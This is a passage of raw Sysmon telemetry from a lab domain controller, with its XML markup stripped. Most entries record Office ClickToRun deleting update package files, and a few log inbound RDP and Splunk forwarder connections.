23542300x800000000000000065095Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.752{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Client\api-ms-win-crt-conio-l1-1-0.dllMD5=E3D0F4E97F07033C1FEAF72362BBB367,SHA256=3067981026FAD83882F211BFE32210CE17F89C6A15916C13E62069E00D5A19E3,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000065094Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.752{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Client\api-ms-win-core-xstate-l2-1-0.dllMD5=42DC903598FF9D2BFB92D3F1F1563A92,SHA256=583BE047AA83CCE2E8950F5F550DABC5F7CB5957860316E3F409BFAFB10B963C,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000065093Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.752{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Client\api-ms-win-core-timezone-l1-1-0.dllMD5=BDD63EA2508C27B43E6D52B10DA16915,SHA256=7D4252AB1B79C5801B58A08CE16EFD3B30D8235733028E5823F3709BD0A98BCF,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000065092Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.752{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Client\api-ms-win-core-synch-l1-2-0.dllMD5=B9BC664A451424342A73A8B12918F88D,SHA256=0C5C4DFEA72595FB7AE410F8FA8DA983B53A83CE81AEA144FA20CAB613E641B7,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000065091Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.752{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Client\api-ms-win-core-processthreads-l1-1-1.dllMD5=247061D7C5542286AEDDADE76897F404,SHA256=CCB974C24DDFA7446278CA55FC8B236D0605D2CAAF273DB8390D1813FC70CD5B,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000065090Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.752{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Client\api-ms-win-core-localization-l1-2-0.dllMD5=6B4F2CA3EFCEB2C21E93F92CDC150A9D,SHA256=B39A515B9E48FC6589703D45E14DCEA2273A02D7FA6F2E1D17985C0228D32564,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000065089Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.752{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Client\api-ms-win-core-file-l2-1-0.dllMD5=ADB3471F89E47CD93B6854D629906809,SHA256=355633A84DB0816AB6A340A086FB41C65854C313BD08D427A17389C42A1E5B69,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000065088Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.752{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Client\api-ms-win-core-file-l1-2-0.dllMD5=19DF2B0F78DC3D8C470E836BAE85E1FF,SHA256=BD9E07BBC62CE82DBC30C23069A17FBFA17F1C26A9C19E50FE754D494E6CD0B1,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000065087Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.736{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\PackageManifests\AuthoredExtensions.16.xmlMD5=4876BF2C894105EF41AA0B6E14775900,SHA256=6F3AF2639897E6574A09A9CC73F3A58B9E935DA9B91A1403CAB40EC238120CF9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065086Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.736{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\PackageManifests\AppXManifestLoc.16.en-us.xmlMD5=C9828B37D1010216A89F9D8845F417D9,SHA256=FBF2941DC4DD083D92D0FD845CD3492DFE3B1FC64BDF886BC7401FEF20D0C642,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065085Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.736{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\PackageManifests\AppXManifest.common.16.xmlMD5=3190C878A91696676E20401DCCF9BA35,SHA256=DBE145F95DBF06829D73C8FAF74AF9B243E1EE463D5676633929964A4692A130,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065084Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.720{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\PackageManifests\AppXManifest.90160000-3102-0000-1000-0000000FF1CE.xmlMD5=638D22A1AAF4198A076056574D217304,SHA256=566E3FFDFBF7544D4FA96BAEA81898328A8E4425BE1D684E2BD443F5A22C1E56,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065083Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.720{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\PackageManifests\AppXManifest.90160000-3101-0000-1000-0000000FF1CE.xmlMD5=807AF192A6E7AC475B3BD18A649AB3F0,SHA256=3D2615F7A1EB9347E05835ACFDCDB3DF9ACAE825CE39DDE3ABB55AD36633048B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065082Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.705{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\PackageManifests\AppXManifest.90160000-012B-0409-1000-0000000FF1CE.xmlMD5=CB9FB0E5C6DB9BF9C65B74028E0ACDC2,SHA256=CB243F60A0A16A6FA7C907CF75AF49E80F6539476FB59FEEA0566BB169FC4EBD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065081Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.705{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\PackageManifests\AppXManifest.90160000-012A-0000-1000-0000000FF1CE.xmlMD5=32BF4F2F9C41E39216F470BD4575EC05,SHA256=AE7315D4E84F696803EDB2E6A7A877096044D888FF0A2943CF0D14462D7FE7FC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065080Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.705{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\PackageManifests\AppXManifest.90160000-0117-0409-1000-0000000FF1CE.xmlMD5=F23D420D6DFC5FED4DAA0F93DA7BB288,SHA256=030EE516346C0E941C90708A2B30B8FA13E0752D5CD85AD857AABF3AE1FFE40B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065079Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.705{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\PackageManifests\AppXManifest.90160000-0115-0409-1000-0000000FF1CE.xmlMD5=D94A45BB813C27EC3796035F69FAE65D,SHA256=9B02F1AE9ED90809CD5EC6CE654BA5E588CC4A25DBD237BB08552CB87E307633,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065078Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.705{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\PackageManifests\AppXManifest.90160000-00E2-0409-1000-0000000FF1CE.xmlMD5=7BAB6B0A74189063D113068DD969D945,SHA256=14D6110163DD4EC617A26884171AA4142475C7180108BBBB483A3F96DCC73118,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065077Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.705{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\PackageManifests\AppXManifest.90160000-00E2-0000-1000-0000000FF1CE.xmlMD5=A96399C138FA7154CCBC86FEC34CEB43,SHA256=FDA2D3B21B8E5A302C3942DB0BE8BB9002266CD4B1B1AEAB42938238B60AA117,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065076Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.705{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\PackageManifests\AppXManifest.90160000-00E1-0409-1000-0000000FF1CE.xmlMD5=54D0A5E625E051090A33AD7170B34F07,SHA256=352D9E7BFFEE274C16EE6B8F7B4181821A04B9F9C86E3DFCAF5B0875486483A6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065075Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.705{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\PackageManifests\AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xmlMD5=F51190CF9DD96C775C750F5C49801844,SHA256=562DCF37326669EEF82E8A36B1E2AEE7ED60C48A269BFE8753E290E89F52149E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065074Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.689{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\PackageManifests\AppXManifest.90160000-00C1-0409-1000-0000000FF1CE.xmlMD5=BDF3061687552D8777EB9D98DA537520,SHA256=6D91DF851B33BF56D1236CF2FD6F3EC39A8B4A0C56EBC36B9D9AF901735A4D40,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065073Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.689{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\PackageManifests\AppXManifest.90160000-00C1-0000-1000-0000000FF1CE.xmlMD5=77824D471883A7221496F35C656A908E,SHA256=452F12C219FB2774C8E584B30270947C10DF60CC9A66869C532CC9C773E9BDDB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065072Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.689{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\PackageManifests\AppXManifest.90160000-00A1-0409-1000-0000000FF1CE.xmlMD5=E95BE577AE362E6106B441CCF2E2E206,SHA256=42D5B65D6BBB8AC89BD564D19DC0A41F5E8BC638A1153B3A05ED614104FF2C38,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065071Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.689{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\PackageManifests\AppXManifest.90160000-00A1-0000-1000-0000000FF1CE.xmlMD5=4DB36DC46E9A57CBADCEC98DBBCA5958,SHA256=C1062037F3D844577409D2098BB7173EA6A093BDE744ADBCAFB08F1A1189E38D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065070Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.689{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\PackageManifests\AppXManifest.90160000-0090-0409-1000-0000000FF1CE.xmlMD5=25E9E014DC3321811652478F23BF2945,SHA256=6259642BFC43BA33DE49FA331CA967639AB5D643EDB10E618483A3ED89B4ED1E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065069Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.689{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\PackageManifests\AppXManifest.90160000-0090-0000-1000-0000000FF1CE.xmlMD5=97B8A8B7CE7CA267898FE22509A67B05,SHA256=7C31C77EB509C342DA3B5C487A066CEBCA55E85E26D1E0450F1FF2D6E71618EE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065068Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.674{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\PackageManifests\AppXManifest.90160000-006E-0409-1000-0000000FF1CE.xmlMD5=EF2D9B6A46182D25CC1216ACC7EA398E,SHA256=23160AB479C55771809B3C60D9082CB9946CD7EA9EED1B9ED00C61EB456CF982,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065067Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.674{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\PackageManifests\AppXManifest.90160000-002C-0409-1000-0000000FF1CE.xmlMD5=3903374D860EF8E33358D3B5F2531BC7,SHA256=F2E5AB105B4CAD2BD078087B63B842A4F8ABE1ECDB87CCB184592D56457BC38E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065066Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.674{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\PackageManifests\AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xmlMD5=A1C5C129B5D92490CEDEF0C62CF26B94,SHA256=08EC684BBE0764713C9A0ABE666C6374299C311071305D57D47E00C453A178D4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065065Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.674{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\PackageManifests\AppXManifest.90160000-001F-040C-1000-0000000FF1CE.xmlMD5=C7B5BEC5962F3FCA1C3B6DE39F9E21B3,SHA256=1F07B20C06889FCE73494E5C97224A16DAD9468D6FB7C1565DAD898E0262D971,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065064Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.674{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\PackageManifests\AppXManifest.90160000-001F-0409-1000-0000000FF1CE.xmlMD5=7A779C86FBC9FFA2E870AF193525A877,SHA256=7544EC93F182F1D0AC5D26A052E3137A97A6ECA42C354629B541126FBEC8F619,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065063Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.674{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\PackageManifests\AppXManifest.90160000-001B-0409-1000-0000000FF1CE.xmlMD5=81FA49817E6DEDD4BB836EDC25CAE5B4,SHA256=DE5C7CD6344C62F3B6AF2B900C723D9A3C923F42452E4FFCA636244416B94E20,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065062Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.674{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\PackageManifests\AppXManifest.90160000-001B-0000-1000-0000000FF1CE.xmlMD5=7041EDFA441F7F8D427488D5C1DB416F,SHA256=B79B2C0F8318E03FBE84E62BD1CBB2EF3F19DC658C4BF2C2ABE00EA26B4285A0,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000065061Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:06.254{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-15386-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000065060Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:06.213{A7A01FEF-E386-607E-7B0A-00000000BB01}5904C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57499-false10.0.1.12-8000- 354300x800000000000000065059Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:06.127{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-18117-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000065058Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.658{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\PackageManifests\AppXManifest.90160000-001A-0409-1000-0000000FF1CE.xmlMD5=128AEDC1BC0AD0A236566D215017CC44,SHA256=657DAF5E974CAD63D5CA9D23467584E6B53F127AB67460ADE4149181E45E42FD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065057Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.658{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\PackageManifests\AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xmlMD5=857A583146B57B6E2C2B43362B5F1418,SHA256=49CE2401446882E572D2EFB31916D0CBD3886BA02664970923E5B5E4A7BE2D56,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065056Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.642{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\PackageManifests\AppXManifest.90160000-0019-0409-1000-0000000FF1CE.xmlMD5=CC6536DB1A420E039FA3891A01EE315E,SHA256=77A826ABAD4E7A8A7E7AC6E443EB29FA536010C1030F7965CA8F54EA4FF59078,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065055Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.642{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\PackageManifests\AppXManifest.90160000-0019-0000-1000-0000000FF1CE.xmlMD5=B318F849A71CB1A1EAA1C8658FAA3921,SHA256=67C357821EF9C367B5E7CFB424D3774E837A4ECB78240C37FAD803337A6DB581,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065054Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.642{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\PackageManifests\AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xmlMD5=C2957EDE4DD65053FA84A76564B09D89,SHA256=B78D63E42EB125D8388948CBB2D4DFB978B5986E8168CFE8D73B7B5564480BF8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065053Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.627{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\PackageManifests\AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xmlMD5=E2E4792F580A0B31AA20F0AC95797004,SHA256=F3C9513E6CEEEC85E65D87FFA1EBF0F4A677F84EC112B0611B8B2FBF4C4850C7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065052Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.627{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\PackageManifests\AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xmlMD5=7DDC8B8C425A7E58D45D2CFD0FDC485A,SHA256=88702F0EF00A349BE036A5883796F55680E2C2718F21027E380F5C24CC799343,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000065051Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:07.627{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft 